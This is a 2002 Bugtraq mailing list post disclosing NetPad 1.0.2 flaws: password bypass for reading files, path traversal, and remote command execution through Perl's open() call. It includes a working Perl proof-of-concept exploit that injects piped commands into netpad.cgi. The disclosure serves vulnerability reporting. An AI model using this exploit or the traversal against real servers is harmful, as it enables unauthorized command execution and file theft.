Bugtraqmailing list archives
LevCGI.coms NetPad 1.0.2 multiple vulnerabilities
From: "BrainRawt ." <brainrawt () hotmail com>
Date: Tue, 14 May 2002 01:44:28 +0000
Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities AdvisoryDiscovered By b0iler(b0iler () hotmail com) andBrainRawt(brainrawt () hotmail com)
About Netpad:------------------<quote from levcgi.com>Easy to install and use text editor for your web browser! This NotePad likeprogram allows you to open your files and pages online in your browser andedit their contents through the browser without forcing you to re-uploadyour changes all the time! Extremely effecient and a must have tool for allwebmasters!</quote from levcgi.com>According to the website, ...NetPad has been downloaded 1225 times!Vulnerable (tested) Versions:--------------------NetPad v 1.0.2Vendor Contact:----------------4-28-02 - Emailed lev () taintedthoughts comVulnerabilities:-- Password Bypass1. The website claims "password security feature to prevent unauthorizedaccess!",
but this is NOT true.A password is not required to read files. It is only required to writeto files.
-- Path Traversal2. Improper filtering of input allows one to enter the traditional"../../../" into the input field to crawl back through directories of the server hostingnetpad.cgi,
allowing one to view any file readable by the webserver.-- Command Execution3. Due to improper usage of the open() function and input filtering, it ispossible for a malicious visitor to remotely execute commands on the serverhosting
netpad.cgi Proof of Concept code can be found below............Remote Command Execution Exploit (POC):---------------------------------------#!/usr/bin/perl# exploit for levcgi's NetPad 1.0.2## This could easily be done with any browser and alittle effort.## requires LWP avaliable at#http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz# also, the number of ../'s differs. It depends on what $basedir# is set to in the netpad.cgi script## usage: perl script.plhttp://site.tld/cgi-bin/netpad.cgi../../../../bin/command
use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("your open call can be exploited" . $ua->agent);my $req = new HTTP::Request POST => $ARGV[0];$req->content_type('application/x-www-form-urlencoded');foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }$req->content("proc=open&of=${of}|");my $res = $ua->request($req);if ($res->is_success) { print $res->content . "\n\nit should haveworked.\n"; }else { print "request failed.\n"; }Fix:------No matter how well one filters input to this program, we recommend that theprogram itself be protected by htaccess.--------------------------------------------------------------------------Did you (Lev) say something about stupid people doing stupid things? -BrainRawt_________________________________________________________________Send and receive Hotmail on your mobile device:http://mobile.msn.com
Current thread:
- LevCGI.coms NetPad 1.0.2 multiple vulnerabilitiesBrainRawt . (May 14)